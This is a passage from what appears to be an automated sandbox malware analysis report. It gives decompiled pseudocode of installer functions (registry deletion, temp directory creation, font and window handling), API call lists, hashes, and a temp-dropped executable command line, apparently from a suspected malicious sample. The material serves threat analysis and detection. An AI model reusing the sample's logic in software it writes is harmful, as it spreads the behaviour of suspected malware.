                                                                                    					}
                                                                                    					return GetLastError();
                                                                                    				}
                                                                                    				return _t23;
                                                                                    			}






                                                                                    0x00405ba4
                                                                                    0x00405ba8
                                                                                    0x00405bab
                                                                                    0x00405bb1
                                                                                    0x00405bb5
                                                                                    0x00405bb9
                                                                                    0x00405bc1
                                                                                    0x00405bc8
                                                                                    0x00405bce
                                                                                    0x00405bd5
                                                                                    0x00405be4
                                                                                    0x00405be6
                                                                                    0x00000000
                                                                                    0x00405be6
                                                                                    0x00405bf0
                                                                                    0x00405bf7
                                                                                    0x00405c0d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405c0f
                                                                                    0x00405c13

                                                                                    APIs
                                                                                    • CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                                                                    • GetLastError.KERNEL32 ref: 00405BF0
                                                                                    • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C05
                                                                                    • GetLastError.KERNEL32 ref: 00405C0F
                                                                                    Strings
                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BBF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                    • API String ID: 3449924974-3081826266
                                                                                    • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                                                    • Instruction ID: 886f74eda6482ab63e8fe18d08a652fea41827dc0a526659a7d7b5e138c44e4e
                                                                                    • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                                                    • Instruction Fuzzy Hash: 95010871D04219EAEF009FA1CD44BEFBBB8EF14314F04403ADA44B6180E7789648CB99
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 48%
                                                                                    			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
                                                                                    				void* _v8;
                                                                                    				int _v12;
                                                                                    				short _v536;
                                                                                    				void* _t27;
                                                                                    				signed int _t33;
                                                                                    				intOrPtr* _t35;
                                                                                    				signed int _t45;
                                                                                    				signed int _t46;
                                                                                    				signed int _t47;
                                                                                    
                                                                                    				_t46 = _a12;
                                                                                    				_t47 = _t46 & 0x00000300;
                                                                                    				_t45 = _t46 & 0x00000001;
                                                                                    				_t27 = E004064D5(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
                                                                                    				if(_t27 == 0) {
                                                                                    					if((_a12 & 0x00000002) == 0) {
                                                                                    						L3:
                                                                                    						_push(0x105);
                                                                                    						_push( &_v536);
                                                                                    						_push(0);
                                                                                    						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
                                                                                    							__eflags = _t45;
                                                                                    							if(__eflags != 0) {
                                                                                    								L10:
                                                                                    								RegCloseKey(_v8);
                                                                                    								return 0x3eb;
                                                                                    							}
                                                                                    							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
                                                                                    							__eflags = _t33;
                                                                                    							if(_t33 != 0) {
                                                                                    								break;
                                                                                    							}
                                                                                    							_push(0x105);
                                                                                    							_push( &_v536);
                                                                                    							_push(_t45);
                                                                                    						}
                                                                                    						RegCloseKey(_v8);
                                                                                    						_t35 = E00406A35(3);
                                                                                    						if(_t35 != 0) {
                                                                                    							return  *_t35(_a4, _a8, _t47, 0);
                                                                                    						}
                                                                                    						return RegDeleteKeyW(_a4, _a8);
                                                                                    					}
                                                                                    					_v12 = 0;
                                                                                    					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
                                                                                    						goto L10;
                                                                                    					}
                                                                                    					goto L3;
                                                                                    				}
                                                                                    				return _t27;
                                                                                    			}












                                                                                    0x00402eb4
                                                                                    0x00402ebd
                                                                                    0x00402ec6
                                                                                    0x00402ed2
                                                                                    0x00402edb
                                                                                    0x00402ee5
                                                                                    0x00402f0a
                                                                                    0x00402f10
                                                                                    0x00402f15
                                                                                    0x00402f16
                                                                                    0x00402f46
                                                                                    0x00402f1f
                                                                                    0x00402f21
                                                                                    0x00402f71
                                                                                    0x00402f74
                                                                                    0x00000000
                                                                                    0x00402f7a
                                                                                    0x00402f30
                                                                                    0x00402f35
                                                                                    0x00402f37
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00402f3f
                                                                                    0x00402f44
                                                                                    0x00402f45
                                                                                    0x00402f45
                                                                                    0x00402f52
                                                                                    0x00402f5a
                                                                                    0x00402f61
                                                                                    0x00000000
                                                                                    0x00402f8a
                                                                                    0x00000000
                                                                                    0x00402f69
                                                                                    0x00402ef5
                                                                                    0x00402f08
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00402f08
                                                                                    0x00402f90

                                                                                    APIs
                                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseEnum$DeleteValue
                                                                                    • String ID:
                                                                                    • API String ID: 1354259210-0
                                                                                    • Opcode ID: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                                                                    • Instruction ID: 37c7ba0f9c491dd7f389852fcb35a119484072d927876f68e32cbd91f0a54eef
                                                                                    • Opcode Fuzzy Hash: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                                                                    • Instruction Fuzzy Hash: 6D216B7150010ABBDF11AF94CE89EEF7B7DEB50384F110076F909B21E0D7B49E54AA68
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 77%
                                                                                    			E00401D81(void* __ebx, void* __edx) {
                                                                                    				struct HWND__* _t30;
                                                                                    				WCHAR* _t38;
                                                                                    				void* _t48;
                                                                                    				void* _t53;
                                                                                    				signed int _t55;
                                                                                    				signed int _t60;
                                                                                    				long _t63;
                                                                                    				void* _t65;
                                                                                    
                                                                                    				_t53 = __ebx;
                                                                                    				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
                                                                                    					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
                                                                                    				} else {
                                                                                    					E00402D84(2);
                                                                                    					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
                                                                                    				}
                                                                                    				_t55 =  *(_t65 - 0x24);
                                                                                    				 *(_t65 + 8) = _t30;
                                                                                    				_t60 = _t55 & 0x00000004;
                                                                                    				 *(_t65 - 0x38) = _t55 & 0x00000003;
                                                                                    				 *(_t65 - 0x18) = _t55 >> 0x1f;
                                                                                    				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
                                                                                    				if((_t55 & 0x00010000) == 0) {
                                                                                    					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
                                                                                    				} else {
                                                                                    					_t38 = E00402DA6(0x11);
                                                                                    				}
                                                                                    				 *(_t65 - 0x44) = _t38;
                                                                                    				GetClientRect( *(_t65 + 8), _t65 - 0x60);
                                                                                    				asm("sbb esi, esi");
                                                                                    				_t63 = LoadImageW( ~_t60 &  *0x42a260,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
                                                                                    				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
                                                                                    				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
                                                                                    					DeleteObject(_t48);
                                                                                    				}
                                                                                    				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
                                                                                    					_push(_t63);
                                                                                    					E004065AF();
                                                                                    				}
                                                                                    				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t65 - 4));
                                                                                    				return 0;
                                                                                    			}











                                                                                    0x00401d81
                                                                                    0x00401d85
                                                                                    0x00401d9a
                                                                                    0x00401d87
                                                                                    0x00401d89
                                                                                    0x00401d8f
                                                                                    0x00401d8f
                                                                                    0x00401da0
                                                                                    0x00401da3
                                                                                    0x00401dad
                                                                                    0x00401db0
                                                                                    0x00401db8
                                                                                    0x00401dc9
                                                                                    0x00401dcc
                                                                                    0x00401dd7
                                                                                    0x00401dce
                                                                                    0x00401dd0
                                                                                    0x00401dd0
                                                                                    0x00401ddb
                                                                                    0x00401de5
                                                                                    0x00401e0c
                                                                                    0x00401e1b
                                                                                    0x00401e29
                                                                                    0x00401e31
                                                                                    0x00401e39
                                                                                    0x00401e39
                                                                                    0x00401e42
                                                                                    0x00401e48
                                                                                    0x00402ba4
                                                                                    0x00402ba4
                                                                                    0x00402c2d
                                                                                    0x00402c39

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                    • String ID:
                                                                                    • API String ID: 1849352358-0
                                                                                    • Opcode ID: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                                                                    • Instruction ID: 4d725fdcf847a80329c23b38d7164c003567f542edd6fcacfb34c9ebeef40da9
                                                                                    • Opcode Fuzzy Hash: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                                                                    • Instruction Fuzzy Hash: 67212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389951DB98
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 73%
                                                                                    			E00401E4E(intOrPtr __edx) {
                                                                                    				void* __edi;
                                                                                    				int _t9;
                                                                                    				signed char _t15;
                                                                                    				struct HFONT__* _t18;
                                                                                    				intOrPtr _t30;
                                                                                    				void* _t31;
                                                                                    				struct HDC__* _t33;
                                                                                    				void* _t35;
                                                                                    
                                                                                    				_t30 = __edx;
                                                                                    				_t33 = GetDC( *(_t35 - 8));
                                                                                    				_t9 = E00402D84(2);
                                                                                    				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                                                    				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
                                                                                    				ReleaseDC( *(_t35 - 8), _t33);
                                                                                    				 *0x40ce08 = E00402D84(3);
                                                                                    				_t15 =  *((intOrPtr*)(_t35 - 0x20));
                                                                                    				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                                                    				 *0x40ce0f = 1;
                                                                                    				 *0x40ce0c = _t15 & 0x00000001;
                                                                                    				 *0x40ce0d = _t15 & 0x00000002;
                                                                                    				 *0x40ce0e = _t15 & 0x00000004;
                                                                                    				E004066A5(_t9, _t31, _t33, 0x40ce14,  *((intOrPtr*)(_t35 - 0x2c)));
                                                                                    				_t18 = CreateFontIndirectW(0x40cdf8);
                                                                                    				_push(_t18);
                                                                                    				_push(_t31);
                                                                                    				E004065AF();
                                                                                    				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
                                                                                    				return 0;
                                                                                    			}











                                                                                    0x00401e4e
                                                                                    0x00401e59
                                                                                    0x00401e5b
                                                                                    0x00401e68
                                                                                    0x00401e7f
                                                                                    0x00401e84
                                                                                    0x00401e91
                                                                                    0x00401e96
                                                                                    0x00401e9a
                                                                                    0x00401ea5
                                                                                    0x00401eac
                                                                                    0x00401ebe
                                                                                    0x00401ec4
                                                                                    0x00401ec9
                                                                                    0x00401ed3
                                                                                    0x00402638
                                                                                    0x0040156d
                                                                                    0x00402ba4
                                                                                    0x00402c2d
                                                                                    0x00402c39

                                                                                    APIs
                                                                                    • GetDC.USER32(?), ref: 00401E51
                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                                    • ReleaseDC.USER32 ref: 00401E84
                                                                                      • Part of subcall function 004066A5: lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\czkdqe.exe" C:\Users\user\AppData\Local\Temp\chwzpb.c,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                                      • Part of subcall function 004066A5: lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\czkdqe.exe" C:\Users\user\AppData\Local\Temp\chwzpb.c,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                                                    • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 2584051700-0
                                                                                    • Opcode ID: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                                                                    • Instruction ID: b9cc094806d22c325402cb6ccb5f5134c2025175c414775df3ff87de861ccae2
                                                                                    • Opcode Fuzzy Hash: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                                                                    • Instruction Fuzzy Hash: 8401B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 59%
                                                                                    			E00401C43(intOrPtr __edx) {
                                                                                    				int _t29;
                                                                                    				long _t30;
                                                                                    				signed int _t32;
                                                                                    				WCHAR* _t35;
                                                                                    				long _t36;
                                                                                    				int _t41;
                                                                                    				signed int _t42;
                                                                                    				int _t46;
                                                                                    				int _t56;
                                                                                    				intOrPtr _t57;
                                                                                    				struct HWND__* _t63;
                                                                                    				void* _t64;
                                                                                    
                                                                                    				_t57 = __edx;
                                                                                    				_t29 = E00402D84(3);
                                                                                    				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                                    				 *(_t64 - 0x18) = _t29;
                                                                                    				_t30 = E00402D84(4);
                                                                                    				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                                    				 *(_t64 + 8) = _t30;
                                                                                    				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
                                                                                    					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
                                                                                    				}
                                                                                    				__eflags =  *(_t64 - 0x1c) & 0x00000002;
                                                                                    				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
                                                                                    					 *(_t64 + 8) = E00402DA6(0x44);
                                                                                    				}
                                                                                    				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
                                                                                    				_push(1);
                                                                                    				if(__eflags != 0) {
                                                                                    					_t61 = E00402DA6();
                                                                                    					_t32 = E00402DA6();
                                                                                    					asm("sbb ecx, ecx");
                                                                                    					asm("sbb eax, eax");
                                                                                    					_t35 =  ~( *_t31) & _t61;
                                                                                    					__eflags = _t35;
                                                                                    					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                                                                                    					goto L10;
                                                                                    				} else {
                                                                                    					_t63 = E00402D84();
                                                                                    					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                                    					_t41 = E00402D84(2);
                                                                                    					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                                    					_t56 =  *(_t64 - 0x1c) >> 2;
                                                                                    					if(__eflags == 0) {
                                                                                    						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
                                                                                    						L10:
                                                                                    						 *(_t64 - 0x38) = _t36;
                                                                                    					} else {
                                                                                    						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
                                                                                    						asm("sbb eax, eax");
                                                                                    						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                                                                    					}
                                                                                    				}
                                                                                    				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
                                                                                    				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
                                                                                    					_push( *(_t64 - 0x38));
                                                                                    					E004065AF();
                                                                                    				}
                                                                                    				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t64 - 4));
                                                                                    				return 0;
                                                                                    			}















                                                                                    0x00401c43
                                                                                    0x00401c45
                                                                                    0x00401c4c
                                                                                    0x00401c4f
                                                                                    0x00401c52
                                                                                    0x00401c5c
                                                                                    0x00401c60
                                                                                    0x00401c63
                                                                                    0x00401c6c
                                                                                    0x00401c6c
                                                                                    0x00401c6f
                                                                                    0x00401c73
                                                                                    0x00401c7c
                                                                                    0x00401c7c
                                                                                    0x00401c7f
                                                                                    0x00401c83
                                                                                    0x00401c85
                                                                                    0x00401cda
                                                                                    0x00401cdc
                                                                                    0x00401ce7
                                                                                    0x00401cf1
                                                                                    0x00401cf4
                                                                                    0x00401cf4
                                                                                    0x00401cfd
                                                                                    0x00000000
                                                                                    0x00401c87
                                                                                    0x00401c8e
                                                                                    0x00401c90
                                                                                    0x00401c93
                                                                                    0x00401c99
                                                                                    0x00401ca0
                                                                                    0x00401ca3
                                                                                    0x00401ccb
                                                                                    0x00401d03
                                                                                    0x00401d03
                                                                                    0x00401ca5
                                                                                    0x00401cb3
                                                                                    0x00401cbb
                                                                                    0x00401cbe
                                                                                    0x00401cbe
                                                                                    0x00401ca3
                                                                                    0x00401d06
                                                                                    0x00401d09
                                                                                    0x00401d0f
                                                                                    0x00402ba4
                                                                                    0x00402ba4
                                                                                    0x00402c2d
                                                                                    0x00402c39

                                                                                    APIs
                                                                                    • SendMessageTimeoutW.USER32 ref: 00401CB3
                                                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Timeout
                                                                                    • String ID: !
                                                                                    • API String ID: 1777923405-2657877971
                                                                                    • Opcode ID: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                                                    • Instruction ID: e1c20d37316975b9b94706f7b3abd8da4b7b3b5136eece5bd2aa3cbae88a6c19
                                                                                    • Opcode Fuzzy Hash: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                                                    • Instruction Fuzzy Hash: 28219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 91%
                                                                                    			E00406536(void* __ecx, void* __eflags, char _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
                                                                                    				int _v8;
                                                                                    				long _t21;
                                                                                    				long _t24;
                                                                                    				char* _t30;
                                                                                    
                                                                                    				asm("sbb eax, eax");
                                                                                    				_v8 = 0x800;
                                                                                    				_t5 =  &_a4; // 0x422728
                                                                                    				_t21 = E004064D5(__eflags,  *_t5, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                                                                                    				_t30 = _a16;
                                                                                    				if(_t21 != 0) {
                                                                                    					L4:
                                                                                    					 *_t30 =  *_t30 & 0x00000000;
                                                                                    				} else {
                                                                                    					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                                                                                    					_t21 = RegCloseKey(_a20);
                                                                                    					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
                                                                                    					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                                                                    						goto L4;
                                                                                    					}
                                                                                    				}
                                                                                    				return _t21;
                                                                                    			}







                                                                                    0x00406544
                                                                                    0x00406546
                                                                                    0x0040655b
                                                                                    0x0040655e
                                                                                    0x00406563
                                                                                    0x00406568
                                                                                    0x004065a6
                                                                                    0x004065a6
                                                                                    0x0040656a
                                                                                    0x0040657c
                                                                                    0x00406587
                                                                                    0x0040658d
                                                                                    0x00406598
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406598
                                                                                    0x004065ac

                                                                                    APIs
                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,0040A230,00000000,('B,00000000,?,?,"C:\Users\user\AppData\Local\Temp\czkdqe.exe" C:\Users\user\AppData\Local\Temp\chwzpb.c,?,?,0040679D,80000002), ref: 0040657C
                                                                                    • RegCloseKey.ADVAPI32(?,?,0040679D,80000002,Software\Microsoft\Windows\CurrentVersion,"C:\Users\user\AppData\Local\Temp\czkdqe.exe" C:\Users\user\AppData\Local\Temp\chwzpb.c,"C:\Users\user\AppData\Local\Temp\czkdqe.exe" C:\Users\user\AppData\Local\Temp\chwzpb.c,"C:\Users\user\AppData\Local\Temp\czkdqe.exe" C:\Users\user\AppData\Local\Temp\chwzpb.c,00000000,00422728), ref: 00406587
                                                                                    Strings
                                                                                    • ('B, xrefs: 0040655B
                                                                                    • "C:\Users\user\AppData\Local\Temp\czkdqe.exe" C:\Users\user\AppData\Local\Temp\chwzpb.c, xrefs: 0040653D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseQueryValue
                                                                                    • String ID: "C:\Users\user\AppData\Local\Temp\czkdqe.exe" C:\Users\user\AppData\Local\Temp\chwzpb.c$('B
                                                                                    • API String ID: 3356406503-832969358
                                                                                    • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                    • Instruction ID: 52dd0fe420a7c1e2827d1a164217834099ee72e945ce70567094b216899e5676
                                                                                    • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                    • Instruction Fuzzy Hash: C4017C72500209FADF21CF51DD09EDB3BA8EF54364F01803AFD1AA2190D738D964DBA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 58%
                                                                                    			E00405F37(WCHAR* _a4) {
